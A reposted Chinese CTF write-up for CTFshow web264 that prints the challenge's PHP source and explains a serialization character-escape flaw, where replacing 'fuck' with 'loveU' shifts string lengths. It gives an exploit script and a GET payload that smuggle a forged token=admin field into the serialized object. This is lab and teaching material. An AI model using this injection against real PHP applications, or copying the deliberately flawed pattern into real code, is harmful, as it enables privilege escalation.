CTFshow 反序列化 web264
生活随笔
收集整理的這篇文章主要介紹了
CTFshow 反序列化 web264
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
目錄
- 源碼
- 思路
- 題解
- 總結
源碼
index.php
<?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-03 02:37:19 # @Last Modified by: h1xa # @Last Modified time: 2020-12-03 16:05:38 | # @message.php |這里給了提示 # @email: h1xa@ctfer.com | # @link: https://ctfer.com*/error_reporting(0); session_start();class message{public $from;public $msg;public $to;public $token='user';public function __construct($f,$m,$t){$this->from = $f;$this->msg = $m;$this->to = $t;} }$f = $_GET['f']; $m = $_GET['m']; $t = $_GET['t'];if(isset($f) && isset($m) && isset($t)){$msg = new message($f,$m,$t);$umsg = str_replace('fuck', 'loveU', serialize($msg));$_SESSION['msg']=base64_encode($umsg);echo 'Your message has been sent'; }highlight_file(__FILE__);message.php
<?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-03 15:13:03 # @Last Modified by: h1xa # @Last Modified time: 2020-12-03 15:17:17 # @email: h1xa@ctfer.com # @link: https://ctfer.com*/ session_start(); highlight_file(__FILE__); include('flag.php');class message{public $from;public $msg;public $to;public $token='user';public function __construct($f,$m,$t){$this->from = $f;$this->msg = $m;$this->to = $t;} }if(isset($_COOKIE['msg'])){$msg = unserialize(base64_decode($_SESSION['msg']));if($msg->token=='admin'){echo $flag;} }思路
典型的字符逃逸問題
fuck每轉一次love就會逃逸出一個字符
先直接拿到序列化結果
<?php class message{public $from;public $msg;public $to='a';public $token='user'; } $msg = new message(); $umsg = serialize($msg); echo $umsg; //O:7:"message":4:{s:4:"from";N;s:3:"msg";N;s:2:"to";s:1:"a";s:5:"token";s:4:"user";}user要改成admin,要逃逸出來的部分實際上是";s:5:"token";s:5:"admin";},一共27個字符要轉換27次
題解
exp <?php class message{public $from;public $msg;public $to;public $token='user';public function __construct($f,$m,$t){$this->from = $f;$this->msg = $m;$this->to = $t;} } $f; $m; $t = 'fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}'; $msg = new message($f,$m,$t); $umsg = str_replace('fuck', 'loveU', serialize($msg)); echo $umsg; //O:7:"message":4:{s:4:"from";N;s:3:"msg";N;s:2:"to";s:135:"loveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveU";s:5:"token";s:5:"admin";}";s:5:"token";s:4:"user";} index.php get:?f=&m=&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";} message.php Cookie 加上 msg= xxx總結
水題
總結
以上是生活随笔為你收集整理的CTFshow 反序列化 web264的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [watevrCTF-2019]Pick
- 下一篇: CTFshow 反序列化 web266